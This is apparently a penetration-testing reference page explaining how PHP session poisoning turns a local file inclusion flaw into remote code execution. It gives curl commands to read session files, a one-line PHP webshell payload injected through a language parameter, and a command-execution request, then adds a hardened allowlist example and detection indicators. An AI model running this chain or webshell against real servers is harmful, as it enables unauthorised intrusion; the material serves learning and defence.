PRIMARY CATEGORY → WEB ATTACKS
REFERENCES
PHP Session Poisoning using LFI

PHP Session Poisoning - LFI to RCE

This attack vector requires writing PHP code into a field under our control whose value is then written to a log file on the remote machine

That file is then included through the LFI so the PHP code it contains is executed

For this attack to work, the user that runs the PHP or Apache process must have read privileges over the logged files

PHP session poisoning works the same way, except the poisoned value is stored in the server-side session file referenced by the PHPSESSID cookie

System Path of PHPSESSID Details

Related PHP Directive → session.save_path

The data associated with a PHPSESSID cookie is stored in a session file on the back-end

Windows → C:\Windows\Temp\sess_<PHPSESSID_VALUE>
Linux → /var/lib/php/sessions/sess_<PHPSESSID_VALUE>
Exploitation
Extracting the PHPSESSID Value
curl --silent --request GET --location --head '<URL>' |& grep -i -- 'PHPSESSID'
Use the LFI to examine the PHPSESSID File Content
curl --silent --request GET --location 'http://domain.tld/home.php?file=/var/lib/php/sessions/sess_<PHPSESSID_VALUE>'
Poisoning Cookie’s Data controlled by the User

Next, check whether any data in the session file is under your control, i.e. whether it can be modified by the user

  • Example I

When a user logs into a web application, the user's name appears as a field in the session file associated with the cookie

  • Example II

The session file may contain a language value which is controlled by the GET parameter ?language=<VALUE>

Writing PHP Code to the Session File through the controlled data

Therefore, an attacker could register a user whose name contains PHP code and then point the LFI at the session file. The PHP code will be executed

The same applies to the URL parameter case: if the value of a URL parameter is stored in the session file tied to the user's cookie, poison that parameter by supplying PHP code as its value

curl --silent --location --request GET --get --data-urlencode 'language=<?php system($_GET["cmd"]);?>' 'http[s]://domain.tld/index.php' # --data-urlencode URL-encodes the value
Including the Session File using the LFI - Executing Commands through the Injected PHP Code
curl --silent --location --request GET 'http[s]://domain.tld/home.php?file=/var/lib/php/sessions/sess_<PHPSESSID_VALUE>&cmd=<COMMAND>'
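The root cause of this whole chain is an include that takes a client-supplied path, which is why a session file full of user data becomes code. As an added example that is not from the original page, the vulnerable `home.php?file=` pattern is shown beside a hardened version that maps the request to a fixed allowlist and validates the `?language=` value before it reaches the session; the `pages/` directory and the page names are assumptions.

```php
<?php
// home.php, vulnerable form (illustrative, not from the page): the path
// supplied by the client is included as-is, so ?file= can point at
// /var/lib/php/sessions/sess_<id> and whatever that file holds is executed.
//
//     include $_GET['file'];
//
// Hardened form: the request only selects a page name, and that name is
// looked up in an allowlist of literal keys. No path separators, "..",
// null bytes or stream wrappers (php://, data://) can ever reach include.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',    // assumed directory layout
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage(string $requested): ?string
{
    // Exact-match lookup; anything not in PAGES yields null.
    return PAGES[$requested] ?? null;
}

// Session data stays data: the language value is checked against a fixed
// set before it is stored, so free text such as "<?php ..." never lands
// in the session file. Even if it did, the allowlisted include above means
// the session file is never executed.
function setLanguage(string $lang): bool
{
    $allowed = ['en', 'de', 'fr'];
    if (!in_array($lang, $allowed, true)) {
        return false;
    }
    $_SESSION['language'] = $lang;
    return true;
}

session_start();
if (isset($_GET['language'])) {
    setLanguage($_GET['language']); // rejected values are simply ignored
}
$page = resolvePage($_GET['file'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
require $page;
```

Detection on the server side follows from the same observation: a request whose `file` parameter contains `sess_`, `/var/lib/php/sessions`, `C:\Windows\Temp` or a `php://` wrapper is never legitimate against an allowlisted include and is worth alerting on in the access log.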